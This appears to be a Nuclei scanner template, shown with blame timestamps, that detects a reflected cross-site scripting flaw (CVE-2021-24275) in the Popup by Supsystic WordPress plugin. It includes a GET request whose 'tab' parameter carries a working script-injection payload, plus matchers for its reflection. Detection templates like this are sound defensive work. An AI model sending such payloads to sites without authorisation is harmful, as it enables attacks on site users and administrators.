2021-09-28 17:03:24 +00:00
id : CVE-2021-24275
info :
2022-08-16 14:14:41 +00:00
name : Popup by Supsystic <1.10.5 - Cross-Site scripting
2021-09-28 17:03:24 +00:00
author : dhiyaneshDK
2021-09-28 17:04:46 +00:00
severity : medium
2022-08-16 14:14:41 +00:00
description : WordPress Popup by Supsystic before 1.10.5 did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected cross-site scripting issue.
2021-09-28 17:03:24 +00:00
reference :
- https://wpscan.com/vulnerability/efdc76e0-c14a-4baf-af70-9d381107308f
2022-05-17 09:18:12 +00:00
- http://packetstormsecurity.com/files/164311/WordPress-Popup-1.10.4-Cross-Site-Scripting.html
2022-08-16 14:14:41 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-24275
2021-09-28 17:04:46 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-28 17:04:46 +00:00
cve-id : CVE-2021-24275
cwe-id : CWE-79
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:supsystic:popup:*:*:*:*:*:*:*:*
epss-score : 0.00177
2022-08-27 04:41:18 +00:00
tags : wpscan,packetstorm,wordpress,cve,cve2021,wp-plugin
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2021-09-28 17:03:24 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-09-28 17:03:24 +00:00
- method : GET
path :
2021-09-28 18:52:52 +00:00
- '{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2021-09-28 17:03:24 +00:00
matchers-condition : and
matchers :
- type : word
words :
2021-09-28 18:52:52 +00:00
- '</script><script>alert(document.domain)</script>'
2021-09-28 17:03:24 +00:00
condition : and
- type : status
status :
- 200
- type : word
words :
- "text/html"
part : header
2022-08-16 14:14:41 +00:00
# Enhanced by mp on 2022/08/15